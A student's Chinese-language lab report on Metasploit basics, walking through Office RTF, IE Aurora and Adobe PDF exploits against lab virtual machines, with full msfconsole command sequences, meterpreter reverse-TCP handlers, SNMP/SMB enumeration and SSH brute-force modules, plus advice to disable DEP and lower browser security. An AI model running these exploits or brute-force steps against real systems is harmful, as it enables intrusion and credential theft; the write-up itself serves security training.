• 20155202张旭 Exp5 MSF基础应用


    20155202张旭 Exp5 MSF基础应用

    实践内容

    本次实验我使用的攻击方式:

    1.针对office软件的主动攻击:——MS10-087:

    2.MS10-002漏洞对浏览器攻击

    3.针对客户端的攻击:Adobe Reader软件的渗透攻击——adobe_toolbutton

    4.APR中间人窃听被动攻击的模块攻击: spoof/arp/arp_poisoning

    6. ARP扫描

    7.SNMP监听: snmp_enum

    - 基础问题回答

    用自己的话解释什么是exploit,payload,encode.

    exploit 漏洞利用

    payload 攻击载荷,是我们exploit中shellcode中的主要功能代码。

    encode 编码,是我们用来修改字符,达到免杀效果。

    首先我们应该知道MSF常用漏洞命令:

    show exploits
    列出metasploit框架中的所有渗透攻击模块。
    show payloads
    列出metasploit框架中的所有攻击载荷。
    show auxiliary
    列出metasploit框架中的所有辅助攻击载荷。
    search name
    查找metasploit框架中所有的渗透攻击和其他模块。
    info
    展示出制定渗透攻击或模块的相关信息。
    use name
    装载一个渗透攻击或模块。
    LHOST
    你本地可以让目标主机连接的IP地址,通常当目标主机不在同一个局域网内时,就需要是一个公共IP地址,特
    
    
    别为反弹式shell使用。
    RHOST
    远程主机或是目标主机。
    set function
    设置特定的配置参数(EG:设置本地或远程主机参数)。
    setg function
    以全局方式设置特定的配置参数(EG:设置本地或远程主机参数)。
    show options
    列出某个渗透攻击或模块中所有的配置参数。
    show targets
    列出渗透攻击所有支持的目标平台。
    set target num
    指定你所知道的目标的操作系统以及补丁版本类型。
    exploit:运行模块
    

    开始试验:

    1.针对office软件的主动攻击:——MS10-087:

    在攻击机输入以下指令:
    msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
    msf exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > set payload windows/exec //运行一个可执行文件
    msf exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > set CMD calc.exe //绑定计算机程序,进行启动
    msf exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > exploit //攻击
    
    • 使用show options命令查看一些参数值,比如文件名、绑定程序等

    • 我用了 cp -r 要复制的文件夹绝对地址 /root 命令,将那个文件夹复制到主机root目录下。

    • 取出来了这个文件,复制到靶机下,双击打开,结果打开了计算器,正确,攻击完成。

    2.MS10-002漏洞对浏览器攻击

    • 该模块针对浏览器包括IE6、IE7、IE8,在kali输入msfconsole进入msf终端
    use windows/browser/ms10_002_aurora
    set SRVHOST 192.168.43.80
    set LHOST 192.168.43.80
    set URIPATH aurora.html
    set LPORT 5202
    
    • 靶机输入地址:http://192.168.43.80:8080/aurora.html

    • 遇到了问题; 打不开网页:

    • 排查发现没有ping通;

    • 改桥接ping通后发现:Internet Explorer 遇到问题需要关闭。我们对此引起的不便表示抱歉。

    • 上网查询后,决定关掉EXplorer程序:到任务管理器关闭explore进程:
      -

    • 然后发现IE浏览器没了,真是愚蠢,然后在计算机程序功能里恢复一下吧:

    • 还是在IE里的inteenet选项里把能启用的都启用,把级别调到最低,总之把IE弄到危险最大化来尝试一下:

    • 添加到可信站点里:

    • 最后尝试一下:


    • 依旧报错,最后我在网上找了 一个方法:

    1. 把下面这行字符复制到cmd框里面去回车等待dll文件全部注册完成就关闭可以了(下面是要运行的代码): 
     for %1 in (%windir%system32*.dll) do regsvr32.exe /s %1 
    完成后重新启动电脑
    2. 打开浏览器,点“工具”→“管理加载项”那里禁用所有可疑插件,或者你能准确知道没问题的保留。
    3,然后→工具→INTERNET选项→常规页面→删除cookies→删除文件→钩选删除所有脱机内容→确定→设置使用的磁盘空间为:8MB或以下(我自己使用1MB)→确定→清除历史纪录→网页保存在历史记录中的天数:3以下→应用确定(我自己使用的设置是0天)。 
    4. 还原浏览器高级设置默认值:工具→INTERNET选项→高级→还原默认设置。 
    5. 恢复默认浏览器的方法“工具”→Internet选项→程序→最下面有个“检查Internet Explorer是否为默认的浏览器”把前面的钩选上,确定。 
    6. 设置主页:“工具”→Internet选项→常规→可以更改主页地址→键入你喜欢的常用网址→应用。 
    
    • 好了,变成这样了:
    • 遇到 出现为了帮助您保护计算机,windows已经关闭此程序这样的问题解决方法如下:
    1. 关闭数据保护,编辑Boot.ini文件,将/NoExecute=OptIn 改为/NoExecute=AlwaysOff。
    2. 要编辑Boot.ini,请在开始中我的电脑上点右键—属性—高级,启动和故障恢复设置,完成
    • 在kail里链接成功:

    • 真心不容易啊,我开了5个虚拟机来做,最后筛选出了一个可以成功的虚拟机:

    • 查ip发现是这个虚拟机:

    完成攻击!

    3.针对客户端的攻击:Adobe Reader软件的渗透攻击——adobe_toolbutton

    • 在攻击机kali输入以下指令:
    msf > use windows/fileformat/adobe_cooltype_sing
    msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp //tcp反向回连
    msf exploit(adobe_cooltype_sing) > set LHOST 192.168.43.80//攻击机ip
    msf exploit(adobe_cooltype_sing) > set LPORT 5202 //攻击端口
    msf exploit(adobe_cooltype_sing) > set FILENAME 20155202.pdf //设置生成pdf文件的名字
    msf exploit(adobe_cooltype_sing) > exploit //攻击
    

    • 将生成的pdf文件拷贝到靶机上,输入back退出当前模块,进入监听模块,输入以下命令:
    msf > use exploit/multi/handler //进入监听模块
    msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向连接
    msf exploit(handler) > set LHOST 192.168.43.80 //攻击机ip
    msf exploit(handler) > set LPORT 5202 //攻击端口固定
    msf exploit(handler) > exploit
    
    • 在靶机上打开生成的pdf:
    • kail上显示回连成功,可以进行操作了:
    • 当靶机关闭pdf文件,则此次监听关闭。

    adobe_toolbutton攻击成功!

    4.辅助模块:

    1,.首先用 : show auxiliary 列出metasploit框架中的所有辅助攻击载荷:

    找一个别人都没用过的作为我的攻击手段。是真的难找啊,找一个满足虚拟机配置还要和其他同学与众不同的,首先我找到了1999年的APR中间人窃听被动攻击的模块:spoof/arp/arp_poisoning

    • 这是 Wget FTP软链接攻击漏洞,2014年阿里巴巴安全部专门为其进行了安全分析:
    • 无奈我没有linux靶机,只好换一个我靶机可以用的arp扫描

    6.ARP扫描

    msf > use auxiliary/scanner/discovery/arp_sweep 
    然后
    set RHOSTS 192.168.108.0-192.168.108.255
    然后 exploit进行攻击
    
    • 可以发现NTP网络时间协议服务器,它是用来同步各个计算机的时间的协议用的。

    7.snmp扫描与枚举:

    简单网络管理协议(SNMP),由一组网络管理的标准组成,包含一个应用层协议(application layer protocol)、数据库模型(database schema)和一组资源对象。该协议能够支持网络管理系统,用以监测连接到网络上的设备是否有任何引起管理上关注的情况
    • 使用SNMP扫描模块可以收集大量信息(如开放端口,服务,主机名,进程和正常运行时间等)。使用我们的Metasploitable虚拟机作为我们的目标,运行辅助/ scanner / snmp / snmp_enum模块
    • 首先查看一下其基本信息:info scanner/snmp/snmp_enum
    开始试验:
    • 需要的模块:
    use auxiliary/scanner/snmp/snmp_login
    use auxiliary/scanner/snmp/snmp_enum
    use auxiliary/scanner/snmp/snmp_enumusers (windows)
    use auxiliary/scanner/snmp/snmp_enumshares (windows)
    
    • 首先加载模块:
    msf > use auxiliary/scanner/snmp/snmp_login 
    msf auxiliary(snmp_login) > show options
    
    • 可以看到161端口正是udp端口。
    • 设置监听ip:msf auxiliary(snmp_login) > set RHOSTS 192.168.244.130
    • 这里要说明我是为了节省时间,其实还可以这样;监听整个网段所有主机
    • 这是我修改网段后得到的结果:
    msf auxiliary(snmp_login) > set THREADS 10   //设置线程
    msf auxiliary(snmp_login) > run 开始跑
    
    • 转到我们的另一个模块:snmp_enum
    msf auxiliary(snmp_enum) > set RHOSTS 192.168.244.130
    msf auxiliary(snmp_enum) > set THREADS 10
    msf auxiliary(snmp_enum) > show options 
    

    • 然后开始跑:msf auxiliary(snmp_login) > run

    • 出错了: Errno::ECONNREFUSED Connection refused - recvfrom(2),这是怎么回事呢?
      Connection refused错误返回,错误码是ECONNREFUSED。从这个错误码知道远端没有这个服务端口,但是161就是UDP端口啊

    • 是不是我的主机有问题?不,在控制面板—程序—打开或关闭windows功能—找到snmp和Internet信息服务,展开---选中FTP的三个项。如果FTP也开启了,那就把端口号改成22。

    • 成功了,现在是连接超时问题:

    • 我换了一台xp靶机尝试:

    • 更改地址:192.168.244.129

    • 哇,新问题了诶SNMP request timeout.

    • 按照这个进行修改:

    此外:

    MSF信息收集还有其他的途径:

    nmap扫描

    db_nmap -sV 192.168.1.1
    

    auxiliary扫描模块

    RHOSTS <>RHOST 
    192.168.1.1-24 192.168.1.1/24 
    files:/root/ip.txt
    

    port扫描

    use auxiliary/scanner/portscan/syn
    set INTERFACE̵ PORTS̵ RHOSTS̵ THREADSҔ run
    

    nmap ipid idle扫描

    use auxiliary/scanner/ip/ipidseq
    set RHOSTS 192.168.1.0/24 Ҕ run
    nmap -PN -sI <dile地址> <扫描地址>
    

    UDP扫描

    use auxiliary/scanner/discovery/udp_sweep
    use auxiliary/scanner/discovery/udp_probe
    

    密码嗅探

    use auxiliary/sniffer/psnuffle
    

    SMB扫描

    SMB版本扫描

    use auxiliary/scanner/smb/smb_version 扫描命名管道,判断SMB服务类型(账号、密码)
    
    use auxiliary/scanner/smb/pipe_auditor 扫描通过SMB管道可以访问的RCERPC服务
    
    use auxiliary/scanner/smb/pipe_dcerpc_auditor SMB共享枚举(账号、密码)
    
    use auxiliary/scanner/smb/smb_enumshares SMB用户枚举(账号、密码)
    
    use auxiliary/scanner/smb/smb_enumusers SID枚举(账号、密码)
    
    use auxiliary/scanner/smb/smb_lookupsid
    

    SSH扫描

    SSH版本扫描

    use auxiliary/scanner/ssh/ssh_version
    

    SMB密码爆破

    use auxiliary/scanner/ssh/ssh_login
        set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/
        root_userpass.txt ; set VERBOSE false ; run
    

    SSH公钥登录

    use auxiliary/scanner/ssh/ssh_login_pubkey
    set KEY_FILE id_rsa;set USERNAME root ;run
    

    实验体会:这次实验让我体会了许多新的漏洞攻击,使我对msf工具的熟练程度有很大提升,同时我对例如SNMP之类的UDP协议有了新的认识,动手能力得到发展。

  • 相关阅读:
    异常以及异常处理框架探析
    ArcGis Server10 for java初试
    C#制作鹰眼全过程(带注释)
    flex remoteobject 因默认设置而调用失败
    ExecutorService.submit(Callable).get()不并发执行
    学习《The Flex, Spring, and BlazeDS full stack》-1
    java.lang.NoSuchMethodError: org.hibernate.mapping.SimpleValue.<init>(Lorg/hibernate/mapping/Table;)V
    用内置jetty运行项目struts2提示找不到Action
    二分查找
    排序
  • 原文地址:https://www.cnblogs.com/zx20155202/p/8894080.html
Copyright © 2020-2023  润新知